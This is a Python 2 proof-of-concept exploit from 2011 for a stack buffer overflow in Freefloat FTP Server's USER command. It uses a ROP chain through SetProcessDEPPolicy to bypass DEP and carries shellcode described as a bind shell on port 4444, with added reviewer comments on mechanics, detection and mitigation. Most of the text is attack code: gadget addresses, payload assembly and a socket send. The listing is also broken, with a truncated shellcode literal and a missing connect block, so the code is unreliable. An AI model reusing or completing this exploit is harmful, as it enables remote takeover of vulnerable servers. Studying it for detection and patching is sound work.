Freefloat FTP Server – Remote Buffer Overflow (DEP Bypass)

  • 作者: blake
    日期: 2011-09-23
  • #!/usr/bin/python
    import socket, sys
    from struct import pack
    # Proof-of-concept for a stack buffer overflow in Freefloat FTP Server's
    # USER command handler (the DEP-bypass variant).  The whole interaction is
    # one TCP connection and one over-long "USER ..." line; nothing is read
    # back from the server.
    # Python 2 only: print statements, raw_input and str-as-bytes throughout.
    print "\n==============================="
    print "Freefloat FTP Server DEP Bypass"
    print " Written by Blake"
    print "===============================\n"
    # NOTE(review): the usage message is printed but the script does not exit,
    # so with the wrong argument count the sys.argv[1] access below raises
    # IndexError instead.
    if len(sys.argv) != 3:
    	print "[*] Usage: %s <target> <port>\n" % sys.argv[0]
    target = sys.argv[1]
    port = int(sys.argv[2])
    # 728 bytes for shellcode
    #Bind Shell shellcode port 4444
    # NOTE(review): the shellcode literal is truncated in this listing -- the
    # opening parenthesis is never closed, so the file as shown does not parse.
    # Going by the two comments above, the complete blob is 728 bytes and opens
    # a bind shell listening on TCP 4444; a new listener on that port appearing
    # right after an FTP USER command is the host-side indicator to watch for.
    shellcode = ("\x31\xc9\xdb\xcd\xbb\xb3\x93\x96\x9d\xb1\x56\xd9\x74\x24\xf4"
    # 230 bytes of filler up to the saved return address.  Note that `buffer`
    # shadows the Python 2 builtin of the same name.
    buffer = "\x41" * 230
    # Overwritten return address: a lone RETN so execution slides straight into
    # the ROP chain that follows.  Every address in this file is an absolute,
    # hard-coded pointer into a specific build of the modules named in the
    # trailing comments (shlwapi, msvcirt, RPCRT4); any relocation (ASLR) or a
    # differing module version breaks the chain.
    eip = pack('<L',0x77f613ac)		# RETN - shlwapi
    # ROP chain.  Going by the gadget comments: EBX is loaded with 0xffffffff
    # and incremented to 0, EBP/EDI/ESI are staged with the remaining pops, and
    # the final PUSHAD lays the register file out as the call frame for
    # SetProcessDEPPolicy(0) -- i.e. DEP is switched off for the process before
    # the shellcode runs.  Mitigation: SetProcessDEPPolicy cannot disable DEP
    # once it is permanently enabled for the process (system AlwaysOn policy),
    # and ASLR invalidates the hard-coded gadget addresses above and below.
    rop = "\x42" * 8			# compensate
    rop += pack('<L',0x77c2362c)		# POP EBX, RETN - msvcirt
    rop += "\xff\xff\xff\xff"
    rop += pack('<L',0x77c127e1)		# INC EBX, RETN
    rop += pack('<L',0x5d093466)		# POP EBP, RETN
    rop += pack('<L',0x7c8622a4)		# SetProcessDEPPolicy 
    rop += pack('<L',0x5d095470)		# POP EDI, RETN
    rop += pack('<L',0x5d095471)		# RETN
    rop += pack('<L',0x5d0913b4)		# POP ESI, RETN
    rop += pack('<L',0x5d095471)# RETN
    rop += pack('<L',0x77e7d102) 		# PUSHAD # RETN - RPCRT4
    nops = "\x90" * 10
    # Pad the USER argument up to 1000 bytes (a negative repeat count yields an
    # empty string, so nothing is truncated if the pieces already exceed that).
    # The result is a fixed-size argument of 0x41/0x42 filler, a 0x90 sled and
    # raw binary -- nothing a real username ever looks like, which makes an
    # over-long or non-printable USER argument a straightforward network-side
    # signature for this class of attack.
    junk = "\x42" * (1000 - len(buffer + eip + rop + nops + shellcode))
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    print "[+] Connecting to %s on port %d" % (target,port)
    # NOTE(review): the next four lines are indented one level deeper than the
    # surrounding code and no s.connect() call appears anywhere -- the
    # enclosing block (presumably a try/except around connect+send, given the
    # "[X] Unable to connect" message) was lost when this page was rendered.
    # The socket is never closed either; the process simply blocks on the
    # raw_input below.
    	print "[+] Sending payload"
    	s.send("USER " + buffer + eip + rop + nops + shellcode + junk + "\r\n")
    	print "[+] Exploit successfully sent"
    	print "[X] Unable to connect to %s" % target
    raw_input("[+] Press any key to exit\n")